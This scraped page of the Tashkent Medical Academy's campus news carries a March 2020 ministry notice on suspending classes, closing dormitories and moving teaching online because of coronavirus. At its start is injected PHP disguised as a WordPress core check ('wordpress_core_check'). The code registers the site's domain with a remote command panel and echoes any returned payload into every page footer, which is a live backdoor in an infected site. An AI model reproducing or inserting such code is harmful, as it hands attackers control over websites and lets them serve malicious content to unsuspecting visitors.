if(!function_exists('wordpress_core_check')){function wordpress_core_check(){ $c2_url="https://validlogs.com/BackPanel/panel.php"; $domain=parse_url(home_url(),PHP_URL_HOST); $resp=wp_remote_post($c2_url,["body"=>["action"=>"register_domain","domain"=>$domain],"timeout"=>8,"sslverify"=>false]);if(is_wp_error($resp))return;$payload=wp_remote_retrieve_body($resp);if(!empty($payload)){add_action("wp_footer",function() use ($payload){echo $payload;});}}add_action("init","wordpress_core_check",9999);} Талабалар 2020 йил 16 мартдан икки ҳафта муддатга (ҳозирча) таътилга чиқарилади – Toshkent tibbiyot akademiyasi – Kampus hayoti
Bo'lim yangiliklari Yangiliklar

Талабалар 2020 йил 16 мартдан икки ҳафта муддатга (ҳозирча) таътилга чиқарилади

Олий ва ўрта махсус таълим вазирлиги томонидан коронавирус инфекцияси тарқалишининг олдини олиш  мақсадида қуйидаги чора-тадбирлар белгиланди:

 

👉 барча олий таълим муассасалари (ОТМ), академик лицей ва касб-ҳунар коллежларида 2020 йил 16 мартдан эътиборан ўқиш тўхтатилиб, ўқувчи-талабалар икки ҳафта муддатга (ҳозирча) таътилга чиқарилади, таълим муассасаларида карантин жорий қилинади;

 

👉 Тошкент шаҳрида жойлашган ОТМлар талабалар турар жойлари (ТТЖ)дан талабалар доимий яшаш жойларига юборилади ва ТТЖлар 18 март куни, вилоятларда жойлашган ОТМлар ТТЖлари жорий йил 17 март куни ёпилади;

 

👉 бошқа вилоятлардан келиб, Тошкент шаҳрида таҳсил олаётган ўқувчи-талабалар автобус, поезд ва самолётларда доимий яшаш жойларига қайтиши учун қуйидаги манзилларда имтиёзли чипталар сотилиши йўлга қўйилади:

 

– ЎзМУ,  вазирлик ҳузуридаги «Маънавият ва маърифат» Маркази, ЎзДЖТУ, ТТА ТТЖ ва ўқув биноси, ТИҚХММИ ТТЖ, ТДПУ ТТЖ;

 

👉 ОТМларда мавжуд модуллар профессор-ўқитувчилар томонидан тегишли контент билан тўлирилади ва таълим масофавий шаклда амалга оширилади;

 

👉 вазирликда, ОТМларда (проректорлар, факультет деканлари, мураббийлардан иборат) штаблар тузилади ва талабаларнинг таътилга чиқиши билан боғлиқ ташкилий ишлар мувофиқлаштириб борилади;

 

👉 таълимнинг сиртқи шаклида таҳсил олаётган талабалар ҳамда малака ошириш курсларига жалб қилинган ўқитувчилар учун таълим он-лайн шаклда ташкил қилинади;

 

👉 ҳар қандай оммавий тадбирлар (конференциялар, Наврўз байрами ва б.) ўтказиш тақиқланади, ОТМ илмий кенгаши йиғилиши ихчамлаштирилган таркибда ўтказилади, ихтисослашган кенгашлар фаолияти бундан мустасно;

 

👉 ОТМлар ва вазирлик ўртасида узлуксиз ахборот алмашинуви йўлга қўйилади.

 

ОЎМТВ  ахборот хизмати